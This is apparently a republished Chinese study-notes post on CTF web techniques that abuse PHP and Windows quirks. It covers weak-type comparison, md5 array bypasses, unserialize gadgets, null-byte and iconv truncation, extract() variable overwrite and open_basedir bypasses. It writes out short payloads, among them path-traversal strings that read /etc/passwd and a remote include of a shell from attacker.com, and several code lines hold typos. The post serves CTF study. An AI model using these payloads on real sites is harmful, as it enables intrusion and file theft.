利用特性攻击(php和win系统)
前言
继续阅读《CTF特训营》web部分
本节是利用特性攻击
1、PHP语言特性
弱类型
比较相等可以用==和===
前者会自动进行类型转换,存在漏洞
一些相等的值
"==0==false'123'==123'abc'==0'123a'==123'0x01'==1'0e123456789'=='0e987654321'[false]==[0]==[NULL]==["]NULL==false==0true==1
一个例子
if(&_GET['a']!=&_GET['b'] && md5(&_GET['a'])===md5(&_GET['b'])){echo $flag;}
可以用a[]=1&b[]=2绕过
当md5函数的参数是数组时,函数会返回NULL
两个都返回NULL就成功绕过了
反序列化
PHP的serialize和unserialize函数配合特殊的类magic函数:__construct、_destruct、__toString、__sleep、__wakeup例子&lists = []Class filelist{public function __toString(){return highlight_file('hiehiehie.txt',true).highlight_file($thie->source,true);}}//...
将source的变量设置为想要读取的文件名
再序列化即可
&lists = []Class filelist{public function __toString(){return highlight_file('hiehiehie.txt',true).highlight_file($thie->source,true);}}&f=new filelist();$f->source="/etc/passwd";print_r(serialize(&f)):
参考:phithon对joomla漏洞的分析
截断
PHP内核是C语言
在遇到NULL(/x00)字符时会当作结束标记
例子
&file = &_GET['file'];include $file.'.tpl.html';
绕过办法
?file=../../../etc/passwd%00?file=../../../{*N}/etc/passwd
不过这个漏洞随着php更新消失了
另一个漏洞是iconv函数
例子
$file=$_GET['file'].'.tpl.html';include(iconv("UTF-8","gb2312",$file));
当file中包含非法utf-8字符时,iconv函数会截断字符串
提交?file=shell.jpg%ff即可绕过
因为单个x80-xff都是非法的
同样的,这个漏洞也随着php更新消失了
伪协议
在php.ini的设置中若allow_url_include=1
即允许远程包含
可以输入
?file=http://attacker.com/shell.jpg上传shell
类似的还有zip协议和phar协议
变量覆盖
函数使用不当
例子
$auth=false;extract($_GET);if($auth){echo "flag{}";}else{echo "Access Denied";}
extract函数将GET传入的数据转换为变量名和变量值
payload
?auth=1
1
防护绕过
open_basedir函数
-
防御PHP跨目录进行文件读写
-
通过DirectoryIterator+Glob绕过
disable_function函数
-
禁用危险函数:system、exec、shell_exec、passthru
-
依赖系统漏洞,如LD_PRELOAD来绕过
2、windows系统特性
短文件名
可以用短文件爆破和下载长文件
一些工具可参考lijiejie的IIS短文件名扫描工具
文件上传
通过x80-xff来绕过黑名单
结语
主要是php的特性
根据之前做题的经验
php5.5之前有很多漏洞
需要熟悉
红客突击队于2019年由队长k龙牵头,联合国内多位顶尖高校研究生成立。团队从成立至今多次参加国际网络安全竞赛并取得良好成绩,积累了丰富的竞赛经验。红客突击队始终秉承先做人后技术的宗旨,旨在打造国际顶尖网络安全团队。其核心团队于2022年转型于信息安全研究院,并为政企提供安全服务与技术支持。
© Honker Security Commando
原文始发于微信公众号(中龙 红客突击队):利用特性攻击(php和win系统)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论